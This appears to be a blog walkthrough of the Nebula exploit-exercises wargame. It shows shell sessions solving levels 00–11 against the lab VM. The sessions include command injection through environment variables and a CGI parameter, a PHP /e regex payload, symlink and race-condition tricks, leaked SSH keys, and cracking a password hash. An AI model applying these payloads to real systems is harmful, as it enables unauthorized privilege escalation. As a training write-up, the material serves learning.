Nebula

https://exploit-exercises.com/nebula/

level00

level00@nebula:~$ find / -perm -4000 2>/dev/null | grep -i flag00
/bin/.../flag00
/rofs/bin/.../flag00
level00@nebula:~$ /bin/.../flag00
Congrats, now run getflag to get your flag!
flag00@nebula:~$ getflag
You have successfully executed getflag on a target account

---

level01

level01@nebula:~$ ls
echo
level01@nebula:~$ cat echo
#!/bin/bash

/bin/bash
level01@nebula:~$ echo $PATH
/home/level01:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
level01@nebula:~$ /home/flag01/flag01
flag01@nebula:~$ getflag
You have successfully executed getflag on a target account

---

level02

level02@nebula:~$ /home/flag02/flag02
about to call system("/bin/echo level02 is cool")
level02 is cool
level02@nebula:~$ echo $USER
level02
level02@nebula:~$ USER="level02;/bin/bash;echo "
level02@nebula:~$ export USER
level02@nebula:~$ echo $USER
level02;/bin/bash;echo
level02@nebula:~$ /home/flag02/flag02
about to call system("/bin/echo level02;/bin/bash;echo  is cool")
level02
flag02@nebula:~$ getflag
You have successfully executed getflag on a target account
flag02@nebula:~$ exit
exit
is cool

---

level03

level03@nebula:/home/flag03$ ls -alh
total 5.5K
drwxr-x--- 1 flag03 level03   60 2011-11-20 20:39 .
drwxr-xr-x 1 root   root     140 2012-08-27 07:18 ..
-rw-r--r-- 1 flag03 flag03   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag03 flag03  3.3K 2011-05-18 02:54 .bashrc
-rw-r--r-- 1 flag03 flag03   675 2011-05-18 02:54 .profile
drwxrwxrwx 1 flag03 flag03    60 2017-01-18 02:27 writable.d
-rwxr-xr-x 1 flag03 flag03    98 2011-11-20 21:22 writable.sh
level03@nebula:/home/flag03$ cat writable.sh
#!/bin/sh

for i in /home/flag03/writable.d/* ; do
        (ulimit -t 5; bash -x "$i")
        rm -f "$i"
done

level03@nebula:/home/flag03$ cd writable.d/
level03@nebula:/home/flag03/writable.d$ cat getflag.sh
#!/bin/bash

/bin/getflag > /tmp/getflag
level03@nebula:/home/flag03/writable.d$ cat /tmp/getflag
You have successfully executed getflag on a target account

---

level04

level04@nebula:~$ /home/flag04/flag04 /home/flag04/token
You may not access '/home/flag04/token'
level04@nebula:~$ ln -s /home/flag04/token thet
level04@nebula:~$ /home/flag04/flag04 thet
06508b5e-8909-4f38-b630-fdb148a848a2

---

level05

level05@nebula:~$ cd /home/flag05/
level05@nebula:/home/flag05$ ls -alh
total 9.0K
drwxr-x--- 1 flag05 level05   80 2017-01-18 02:34 .
drwxr-xr-x 1 root   root     200 2012-08-27 07:18 ..
drwxr-xr-x 2 flag05 flag05    42 2011-11-20 20:13 .backup
-rw------- 1 flag05 flag05    14 2017-01-18 02:34 .bash_history
-rw-r--r-- 1 flag05 flag05   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag05 flag05  3.3K 2011-05-18 02:54 .bashrc
drwx------ 2 flag05 flag05    60 2017-01-18 02:34 .cache
-rw-r--r-- 1 flag05 flag05   675 2011-05-18 02:54 .profile
drwx------ 2 flag05 flag05    70 2011-11-20 20:13 .ssh
level05@nebula:/home/flag05$ cd .backup/
level05@nebula:/home/flag05/.backup$ ls -alh
total 2.0K
drwxr-xr-x 2 flag05 flag05    42 2011-11-20 20:13 .
drwxr-x--- 1 flag05 level05   80 2017-01-18 02:34 ..
-rw-rw-r-- 1 flag05 flag05  1.8K 2011-11-20 20:13 backup-19072011.tgz
level05@nebula:/home/flag05/.backup$ cp backup-19072011.tgz ~
level05@nebula:/home/flag05/.backup$ cd !$
cd ~
level05@nebula:~$ ls
backup-19072011.tgz
level05@nebula:~$ gunzip backup-19072011.tgz
level05@nebula:~$ ls
backup-19072011.tar
level05@nebula:~$ tar xvf backup-19072011.tar
.ssh/
.ssh/id_rsa.pub
.ssh/id_rsa
.ssh/authorized_keys
level05@nebula:~$ ssh flag05@localhost -i .ssh/id_rsa
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is ea:8d:09:1d:f1:69:e6:1e:55:c7:ec:e9:76:a1:37:f0.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts.

      _   __     __          __
     / | / /__  / /_  __  __/ /___ _
    /  |/ / _ \/ __ \/ / / / / __ `/
   / /|  /  __/ /_/ / /_/ / / /_/ /
  /_/ |_/\___/_.___/\__,_/_/\__,_/
...snip...
flag05@nebula:~$ getflag
You have successfully executed getflag on a target account

---

level06

level06@nebula:~$ cat /etc/passwd | grep flag06
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh
level06@nebula:~$ exit
logout
Connection to nebula closed.
> john passwd
...snip...
> john --show passwd 
flag06:hello:993:993::/home/flag06:/bin/sh

1 password hash cracked, 0 left
>  ssh flag06@nebula

      _   __     __          __
     / | / /__  / /_  __  __/ /___ _
    /  |/ / _ \/ __ \/ / / / / __ `/
   / /|  /  __/ /_/ / /_/ / / /_/ /
  /_/ |_/\___/_.___/\__,_/_/\__,_/
...snip...
flag06@nebula's password:
...snip...
flag06@nebula:~$ getflag
You have successfully executed getflag on a target account

---

level07

> curl "http://nebula:7007/index.cgi?Host=%60/bin/getflag>/tmp/level07flag%60"
Usage: ping [-LRUbdfnqrvVaAD] [-c count] [-i interval] [-w deadline]
            [-p pattern] [-s packetsize] [-t ttl] [-I interface]
            [-M pmtudisc-hint] [-m mark] [-S sndbuf]
            [-T tstamp-options] [-Q tos] [hop1 ...] destination%
> ssh level07@nebula

      _   __     __          __
     / | / /__  / /_  __  __/ /___ _
    /  |/ / _ \/ __ \/ / / / / __ `/
   / /|  /  __/ /_/ / /_/ / / /_/ /
  /_/ |_/\___/_.___/\__,_/_/\__,_/
...snip...
level07@nebula's password:
...snip...
level07@nebula:~$ cat /tmp/level07flag
You have successfully executed getflag on a target account

---

level08

Load pcap in Wireshark.

Linux 2.6.38-8-generic-pae (::ffff:10.1.1.2) (pts/10)

..wwwbugs login: l.le.ev.ve.el.l8.8
..
Password: backdoor...00Rm8.ate
.
..
Login incorrect
wwwbugs login: 

Password is not 'backdoor', the dots are backspaces.

backdoor becomes:
backd00Rm8
backd00Rm8 becomes:
backd00Rmate

---

level09

level09@nebula:~$ cat test
[email {${system($use_me)}}]

level09@nebula:~$ /home/flag09/flag09 test "/bin/getflag"
You have successfully executed getflag on a target account
PHP Notice:  Undefined variable: You have successfully executed getflag on a target account in /home/flag09/flag09.php(15) : regexp code on line 1

level09@nebula:~$

---

level10

level10@nebula:~$ cat nc.sh
#!/bin/bash

while true
do
        nc -l 18211 &
done
level10@nebula:~$ cat ln1.sh
#!/bin/bash

while true
do
        ln -sf /home/flag10/token /home/level10/token &
done
level10@nebula:~$ cat ln2.sh
#!/bin/bash

while true
do
        ln -sf /home/level10/x /home/level10/token &
done
level10@nebula:~$ cat run.sh
#!/bin/bash

while true
do
        /home/flag10/flag10 /home/level10/token 127.0.0.1 &
done
level10@nebula:~$ cat x
x

* Run all bash scripts and then nc.sh (race condition)

level10@nebula:~$ ./nc.sh 
nc: nc: nc: nc: nc: nc: nc: nc: nc: nc: nc: nc:
nc: Address already in use
nc: .oO Oo.
x
Address already in use
Address already in use
Address already in use
Address already in use
nc: nc: nc: Address already in use
Address already in use
Address already in use
Address already in use
nc: Address already in use
nc: Address already in use
Address already in use
.oO Oo.
x
nc: Address already in use
Address already in use
Address already in use
Address already in use
Address already in use
nc: nc: nc: Address already in use
nc: Address already in use
nc: Address already in use
Address already in use
Address already in use
nc: nc: nc: Address already in use
nc: .oO Oo.
615a2ce1-b2b5-4c76-8eed-8aa5c4015c27

---

level11

level11@nebula:~$ PATH=/home/level11:$PATH
level11@nebula:~$ export PATH
level11@nebula:~$ echo -e "Content-Length: 1\nDDD" | /home/flag11/flag11
getflag is executing on a non-flag account, this doesn't count (BUG)

TBC...

No comments:

Post a Comment